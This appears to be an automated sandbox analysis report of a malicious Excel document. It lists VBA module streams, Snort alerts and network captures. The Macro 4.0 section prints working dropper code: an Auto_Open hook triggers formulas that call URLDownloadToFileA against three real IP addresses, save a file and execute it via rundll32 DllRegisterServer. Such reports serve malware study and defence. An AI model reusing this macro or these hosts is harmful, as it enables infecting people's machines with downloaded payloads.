VBA Code Keywords

Keyword
"Blasr"
Application.Run
Attribute
Auto_Open()
VB_Name
Private
VBA Code
Attribute VB_Name = "Blasr"
Private Sub Auto_Open()
Application.Run Sheets("Nyukasl").Range("AJ6")

Application.Run Sheets("Nyukasl").Range("A5")
Application.Run Sheets("Nyukasl").Range("A5")






End Sub
VBA File Name: Briks.cls, Stream Size: 990
General
Stream Path:VBA/Briks
VBA File Name:Briks.cls
Stream Size:990
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
"Briks"
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Briks"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: Byutut.bas, Stream Size: 1056
General
Stream Path:VBA/Byutut
VBA File Name:Byutut.bas
Stream Size:1056
Data ASCII:. . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name
"Byutut"
VBA Code
Attribute VB_Name = "Byutut"
VBA File Name: Class1.cls, Stream Size: 1151
General
Stream Path:VBA/Class1
VBA File Name:Class1.cls
Stream Size:1151
Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Class2.cls, Stream Size: 999
General
Stream Path:VBA/Class2
VBA File Name:Class2.cls
Stream Size:999
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Class3.cls, Stream Size: 999
General
Stream Path:VBA/Class3
VBA File Name:Class3.cls
Stream Size:999
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Kikide.cls, Stream Size: 1249
General
Stream Path:VBA/Kikide
VBA File Name:Kikide.cls
Stream Size:1249
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
"Kikide"
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Kikide"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: UserForm1.frm, Stream Size: 1526
General
Stream Path:VBA/UserForm1
VBA File Name:UserForm1.frm
Stream Size:1526
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Vrest.bas, Stream Size: 679
General
Stream Path:VBA/Vrest
VBA File Name:Vrest.bas
Stream Size:679
Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
"Vrest"
VB_Name
VBA Code
Attribute VB_Name = "Vrest"
VBA File Name: Vsewd.cls, Stream Size: 990
General
Stream Path:VBA/Vsewd
VBA File Name:Vsewd.cls
Stream Size:990
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"Vsewd"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Vsewd"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856
General
Stream Path:PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:856
Entropy:5.31019504221
Base64 Encoded:True
Data ASCII:I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4
Data Raw:49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77
Stream Path: PROJECTwm, File Type: data, Stream Size: 209
General
Stream Path:PROJECTwm
File Type:data
Stream Size:209
Entropy:3.32661660177
Base64 Encoded:False
Data ASCII:K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
Data Raw:4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43
Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
General
Stream Path:UserForm1/\x1CompObj
File Type:data
Stream Size:97
Entropy:3.61064918306
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
General
Stream Path:UserForm1/\x3VBFrame
File Type:ASCII text, with CRLF line terminators
Stream Size:266
Entropy:4.62034133633
Base64 Encoded:True
Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
Stream Path: UserForm1/f, File Type: data, Stream Size: 38
General
Stream Path:UserForm1/f
File Type:data
Stream Size:38
Entropy:1.54052096453
Base64 Encoded:False
Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: UserForm1/o, File Type: empty, Stream Size: 0
General
Stream Path:UserForm1/o
File Type:empty
Stream Size:0
Entropy:0.0
Base64 Encoded:False
Data ASCII:
Data Raw:
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263
General
Stream Path:VBA/_VBA_PROJECT
File Type:data
Stream Size:4263
Entropy:4.38205341073
Base64 Encoded:False
Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
Stream Path: VBA/dir, File Type: data, Stream Size: 1024
General
Stream Path:VBA/dir
File Type:data
Stream Size:1024
Entropy:6.73319737871
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Macro 4.0 Code

,,"=CONCATENATE(AF80,AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AF80,AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AF80,AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,"=""http://""","=""91.211.91.81/""",,,=HALT(),,,"=""5.34.179.36/""",,,,,,"=""45.153.229.23/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
"=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/04/21-17:31:37.151983 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49165 | 91.211.91.81 | 192.168.2.22
05/04/21-17:31:37.893150 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49166 | 5.34.179.36 | 192.168.2.22
05/04/21-17:31:38.095777 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 45.153.229.23 | 192.168.2.22

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 17:31:36.918416977 CEST | 49165 | 80 | 192.168.2.22 | 91.211.91.81
May 4, 2021 17:31:37.004010916 CEST | 80 | 49165 | 91.211.91.81 | 192.168.2.22
May 4, 2021 17:31:37.004089117 CEST | 49165 | 80 | 192.168.2.22 | 91.211.91.81
May 4, 2021 17:31:37.004764080 CEST | 49165 | 80 | 192.168.2.22 | 91.211.91.81
May 4, 2021 17:31:37.089056015 CEST | 80 | 49165 | 91.211.91.81 | 192.168.2.22
May 4, 2021 17:31:37.151983023 CEST | 80 | 49165 | 91.211.91.81 | 192.168.2.22
May 4, 2021 17:31:37.152132034 CEST | 49165 | 80 | 192.168.2.22 | 91.211.91.81
May 4, 2021 17:31:37.175246954 CEST | 49166 | 80 | 192.168.2.22 | 5.34.179.36
May 4, 2021 17:31:37.320403099 CEST | 80 | 49166 | 5.34.179.36 | 192.168.2.22
May 4, 2021 17:31:37.320493937 CEST | 49166 | 80 | 192.168.2.22 | 5.34.179.36
May 4, 2021 17:31:37.321652889 CEST | 49166 | 80 | 192.168.2.22 | 5.34.179.36
May 4, 2021 17:31:37.466504097 CEST | 80 | 49166 | 5.34.179.36 | 192.168.2.22
May 4, 2021 17:31:37.893150091 CEST | 80 | 49166 | 5.34.179.36 | 192.168.2.22
May 4, 2021 17:31:37.893311024 CEST | 49166 | 80 | 192.168.2.22 | 5.34.179.36
May 4, 2021 17:31:37.909271002 CEST | 49167 | 80 | 192.168.2.22 | 45.153.229.23
May 4, 2021 17:31:37.974191904 CEST | 80 | 49167 | 45.153.229.23 | 192.168.2.22
May 4, 2021 17:31:37.974297047 CEST | 49167 | 80 | 192.168.2.22 | 45.153.229.23
May 4, 2021 17:31:37.974946022 CEST | 49167 | 80 | 192.168.2.22 | 45.153.229.23
May 4, 2021 17:31:38.039567947 CEST | 80 | 49167 | 45.153.229.23 | 192.168.2.22
May 4, 2021 17:31:38.095777035 CEST | 80 | 49167 | 45.153.229.23 | 192.168.2.22
May 4, 2021 17:31:38.095932961 CEST | 49167 | 80 | 192.168.2.22 | 45.153.229.23
May 4, 2021 17:32:42.154681921 CEST | 80 | 49165 | 91.211.91.81 | 192.168.2.22
May 4, 2021 17:32:42.154810905 CEST | 49165 | 80 | 192.168.2.22 | 91.211.91.81
May 4, 2021 17:32:42.895155907 CEST | 80 | 49166 | 5.34.179.36 | 192.168.2.22
May 4, 2021 17:32:42.895340919 CEST | 49166 | 80 | 192.168.2.22 | 5.34.179.36
May 4, 2021 17:32:43.096932888 CEST | 80 | 49167 | 45.153.229.23 | 192.168.2.22
May 4, 2021 17:32:43.097176075 CEST | 49167 | 80 | 192.168.2.22 | 45.153.229.23
May 4, 2021 17:33:36.837270975 CEST | 49167 | 80 | 192.168.2.22 | 45.153.229.23
May 4, 2021 17:33:36.837434053 CEST | 49166 | 80 | 192.168.2.22 | 5.34.179.36
May 4, 2021 17:33:36.837641001 CEST | 49165 | 80 | 192.168.2.22 | 91.211.91.81
May 4, 2021 17:33:36.904419899 CEST | 80 | 49167 | 45.153.229.23 | 192.168.2.22
May 4, 2021 17:33:36.922075033 CEST | 80 | 49165 | 91.211.91.81 | 192.168.2.22
May 4, 2021 17:33:36.984883070 CEST | 80 | 49166 | 5.34.179.36 | 192.168.2.22

HTTP Request Dependency Graph

  • 91.211.91.81
  • 5.34.179.36
  • 45.153.229.23

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 91.211.91.81 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 17:31:37.004764080 CEST | 0 | OUT | GET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.211.91.81
Connection: Keep-Alive
May 4, 2021 17:31:37.151983023 CEST | 1 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 15:31:37 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
